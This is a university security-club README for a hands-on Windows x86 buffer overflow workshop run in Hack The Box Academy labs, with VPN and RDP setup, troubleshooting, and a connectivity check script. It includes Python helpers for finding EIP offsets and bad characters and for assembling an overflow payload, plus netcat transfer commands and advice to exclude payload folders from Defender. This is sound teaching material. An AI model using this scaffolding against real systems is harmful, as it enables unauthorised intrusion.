CSEC-President/csec-windows-exploitation-workshop
CSEC Windows Exploitation Workshop

A hands-on introduction to Windows buffer overflow exploitation using Hack The Box Academy.

Prerequisites

  • Computer with 4GB+ RAM
  • Web browser
  • VPN client (OpenVPN or built-in OS support)
  • Basic understanding of memory and assembly concepts
  • Linux/macOS/Windows host system for VPN connection

Workshop Structure

This workshop uses Hack The Box Academy's Stack-Based Buffer Overflows on Windows x86 module to learn Windows exploitation fundamentals. You'll learn stack buffer overflows, debugging techniques, and exploit development basics.

Important Note: The module uses x64dbg (specifically its 32-bit build, x32dbg, because the target application is x86). WinDbg is often required for more advanced Windows work, especially kernel debugging and analysing modern mitigations. Learning a new debugger costs time, so stick with x64dbg for this workshop and pick up WinDbg later if you want to go deeper into Windows exploitation.


Part 1: Hack The Box Account Setup

Step 1: Check Your HTB Account Status

If you have an existing HTB account:

  1. Log in to HTB Academy
  2. Check your cube balance (top-left corner)

If you have enough cubes to unlock the module: skip to Part 2

If you need cubes or don't have an account: continue to Step 2

Step 2: Register/Get Cubes

Register using the referral link to receive cubes:

https://referral.hackthebox.com/mzIhnQt

Registration process:

  1. Click the referral link above
  2. Create account with email/username
  3. Verify your email
  4. Complete the onboarding tutorial

Part 2: VPN Setup

Understanding HTB VPN

HTB uses isolated lab environments accessed via VPN. Each module provides a VPN configuration file for secure access to target machines.

Step 1: Access the Module

Navigate to: https://academy.hackthebox.com/module/details/89

Start the module (read the introduction first!) and spawn the target machine when ready.

Step 2: Download VPN Configuration

Note: You can skip this step if using Pwnbox, but I recommend learning the VPN setup for future exercises.

  1. Click "VPN Servers" in the module interface
  2. Select a server (e.g., "US Academy 3")
  3. Download the .ovpn configuration file
  4. Save it to a known location

Step 3: Connect to VPN

Linux:

# Install OpenVPN if needed
sudo apt update
sudo apt install openvpn

# Connect to HTB VPN
sudo openvpn academy-lab_[username].ovpn

macOS:

# Install OpenVPN via Homebrew
brew install openvpn

# Connect to HTB VPN
sudo openvpn --config academy-lab_[username].ovpn

Windows (OpenVPN GUI):

  1. Download OpenVPN GUI from OpenVPN Community Downloads
  2. Install and run OpenVPN GUI
  3. Import the .ovpn file (drag to system tray icon)
  4. Right-click tray icon → Connect

Verify Connection:

# Confirm the tunnel interface came up and received an address
ip addr show tun0          # Linux
ifconfig | grep -A3 utun   # macOS (OpenVPN creates a utunN interface)
ipconfig                   # Windows (look for the TAP/OpenVPN adapter)

# Confirm you can reach the lab: ping the target IP shown on the module page after spawning
ping <target_ip>

Part 3: Accessing the Windows Target

Connect to Windows VM

Once VPN is connected and target is spawned:

# Get target IP from HTB platform (shown after spawning)
TARGET_IP=<target_ip_from_htb>

# Connect via RDP from Linux
xfreerdp /v:$TARGET_IP /u:htb-student /p:<password_from_htb>

# Alternative: fixed resolution, and skip the prompt for the target's self-signed certificate
xfreerdp /v:$TARGET_IP /u:htb-student /p:<password> /w:1920 /h:1080 /cert-ignore

# From Windows (Run dialog: Win+R)
mstsc /v:<target_ip>

# From macOS (using Microsoft Remote Desktop from App Store) 
# Add PC → PC Name: <target_ip> → User: htb-student
# (or just use Pwnbox)

Connection Issues:

  • Ensure VPN is connected: ping <target_ip>
  • Try different RDP clients if one fails
  • Check firewall isn't blocking RDP (port 3389)
  • Verify credentials from HTB platform
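The "Verify Connection" and "Connection Issues" checks above, gathered into one script. This is an added example for this README, not code from the HTB module or the original workshop: it confirms a tunnel interface exists, sends one ICMP echo to the target, and attempts a TCP handshake to 3389 before you start swapping RDP clients. `loopback_self_check` exercises the port check against a throwaway listener on 127.0.0.1 so the script can be tried without the VPN; the target IP and RDP port are whatever the module page shows.

```python
import platform
import socket
import subprocess
from typing import Dict, Tuple


def tcp_port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Attempt a full TCP handshake; True if something accepts on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def vpn_interface_present() -> bool:
    """True if a tun-style interface exists (tun0 on Linux, utunN on macOS).
    Caveat: macOS has several utunN interfaces even without a VPN, so treat this
    as a hint only; the reachability checks below are the real test.
    socket.if_nameindex() may be unavailable on some platforms, hence the except."""
    try:
        names = [name for _, name in socket.if_nameindex()]
    except (AttributeError, OSError):
        return False
    return any(name.startswith(("tun", "utun")) for name in names)


def host_pingable(host: str) -> bool:
    """Send one ICMP echo; ping's count flag is -n on Windows and -c elsewhere."""
    count_flag = "-n" if platform.system() == "Windows" else "-c"
    try:
        proc = subprocess.run(["ping", count_flag, "1", host],
                              capture_output=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return False
    return proc.returncode == 0


def preflight(target_ip: str, rdp_port: int = 3389) -> Dict[str, bool]:
    """Run the checks in the order they usually fail: tunnel, then ICMP, then RDP."""
    return {
        "vpn_interface": vpn_interface_present(),
        "icmp": host_pingable(target_ip),
        "rdp_port": tcp_port_open(target_ip, rdp_port),
    }


def loopback_self_check() -> Tuple[bool, bool]:
    """Offline demonstration of tcp_port_open: a throwaway listener on 127.0.0.1
    should report open while bound and closed once it is torn down."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    server.listen(1)
    port = server.getsockname()[1]
    while_listening = tcp_port_open("127.0.0.1", port, timeout=1.0)
    server.close()
    after_close = tcp_port_open("127.0.0.1", port, timeout=1.0)
    return while_listening, after_close


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        for check, ok in preflight(sys.argv[1]).items():
            print(f"{check:14s} {'OK' if ok else 'FAIL'}")
    else:
        print("self-check (while listening, after close):", loopback_self_check())
```

Run it as `python3 preflight.py <target_ip>` once the VPN is up. A failing `icmp` with a present tunnel usually means the target has not finished spawning; a passing `icmp` with a failing `rdp_port` points at the target's firewall or a spawn that is still booting, not at your RDP client.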

Part 4: Workshop Exercises

Follow the HTB Academy module sections in order.


Common Issues & Solutions

VPN Connection Problems

# Kill existing OpenVPN connections
sudo killall openvpn

# Try TCP instead of UDP (useful on networks that block outbound UDP):
# re-download the .ovpn from "VPN Servers" with the TCP option selected, or
# edit the existing file and change:
# proto udp → proto tcp
# remote <server> 1337 → remote <server> 443

# Check the routing table for the lab routes pushed over tun0
ip route
route -n  # Alternative (needs net-tools)

RDP Connection Failed

# Test connectivity first
ping <target_ip>
nmap -p 3389 <target_ip>

# Ignore certificate warnings (the target presents a self-signed certificate)
xfreerdp /v:<ip> /u:htb-student /p:<pass> /cert-ignore

# Try legacy RDP security only if the server rejects the default NLA/TLS negotiation
xfreerdp /v:<ip> /u:htb-student /p:<pass> /sec:rdp

x32dbg/x64dbg Crashes

# The target application in this module is 32-bit, so use x32dbg.exe
# (shipped in the same x64dbg package), not x64dbg.exe
# Run as Administrator: right-click x32dbg.exe → Run as Administrator

# If Defender quarantines the vulnerable application or your payload files,
# add an exclusion for the working folder:
# Windows Security → Virus & threat protection → Exclusions
# Add folder: C:\Users\htb-student\Desktop\

Linux Commands Reference

Essential Commands for the Workshop

# Network Testing
ping <ip>                   # Test connectivity
traceroute <ip>             # Trace network path
netstat -an                 # Show network connections
ss -tulpn                   # Show listening ports

# File Transfer to Windows
# Python HTTP server (run from the directory holding the file)
python3 -m http.server 8080
# On Windows: open http://<your_ip>:8080/exploit.py in the browser

# Using netcat (the listener sends; the Windows VM has no nc by default,
# so the HTTP server above is usually the easier route)
nc -lvnp 4444 < exploit.py  # Send file
nc <ip> 4444 > exploit.py   # Receive file

# Process Monitoring
ps aux | grep openvpn       # Check VPN process
pgrep -f academy            # Find the openvpn process started with the academy-lab .ovpn

# Permissions
chmod +x exploit.py         # Make executable
sudo command                # Run with privileges

Module Progression Tips

  1. Don't rush: Each concept builds on the previous
  2. Take notes: Document EIP offsets, bad characters, and addresses
  3. Consider WinDbg: the module uses x64dbg, but WinDbg is the tool for kernel debugging and much modern Windows exploitation work, so budget time for it afterwards
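The bookkeeping in tip 2 (EIP offset, bad characters, return address) is mechanical enough to script. The following is an added example for this README, not code from the HTB module or the workshop: it generates a Metasploit-style cyclic pattern, maps a crashed EIP value back to its offset (accounting for x86 little-endian byte order), builds and checks the bad-character string, and assembles the final buffer. The EIP value 0x41316141, the return address 0x12345678 and the `int3` shellcode in the test are constructed placeholders, not values from the lab target; use what your debugger shows.

```python
import string
import struct
from typing import Optional


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is unique
    for the first 20,280 bytes, so the value that lands in EIP identifies its offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the unique range of this pattern")


def pattern_offset(pattern: bytes, eip_value: int) -> Optional[int]:
    """Map the EIP value shown by the debugger back to a byte offset.
    x86 is little-endian: EIP = 0x41316141 means the bytes 41 61 31 41 ('Aa1A')
    sat at that position in the buffer, in that order."""
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    return None if idx == -1 else idx


def badchar_string(exclude: bytes = b"\x00") -> bytes:
    """Every byte value not yet known to be bad. 0x00 is excluded from the start
    because it terminates C strings and is almost always bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_badchar(sent: bytes, received: bytes) -> Optional[int]:
    """Compare the bytes sent with the bytes the debugger shows on the stack.
    Stop at the first mismatch or truncation: a bad character usually mangles or
    cuts everything after it, so later differences cannot be trusted.
    Add the hit to the exclusion list and resend until the two match."""
    for i, b in enumerate(sent):
        if i >= len(received) or received[i] != b:
            return b
    return None


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  nop_sled: int = 16, total: int = 2000) -> bytes:
    """Classic layout: filler up to EIP, return address packed little-endian
    (e.g. a 'jmp esp' in a module without ASLR/SafeSEH), NOP sled, shellcode,
    then padding so the send is the same length that crashed during fuzzing."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode
    if len(buf) > total:
        raise ValueError(f"payload is {len(buf)} bytes, larger than total={total}")
    return buf + b"C" * (total - len(buf))
```

Send `cyclic_pattern(n)` instead of `"A" * n` once you have a crash length; the EIP value in x32dbg then goes straight into `pattern_offset`. For bad characters, dump the stack at ESP after the crash, compare it with `first_badchar`, and repeat with each new exclusion before picking the return address, because the gadget address itself must not contain a bad byte.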

Disclaimer

Educational Purpose: This workshop teaches security testing techniques for authorized environments only. Use these skills exclusively on systems you own or have explicit written permission to test.

Legal Responsibility: You are solely responsible for your actions. The instructor and organizers accept no responsibility for:

  • Unauthorized access to systems
  • Data loss or system damage
  • Legal consequences of misuse
  • Any malicious use of techniques learned

Ethical Guidelines:

  • Never test systems without explicit authorization
  • Report vulnerabilities responsibly
  • Respect privacy and confidentiality
  • Use knowledge to improve security, not exploit it

By participating, you acknowledge understanding these terms and agree to use this knowledge ethically and legally.


Additional Resources

Basic

Advanced


Author: Sasha Zyuzin

Good luck! 🎯
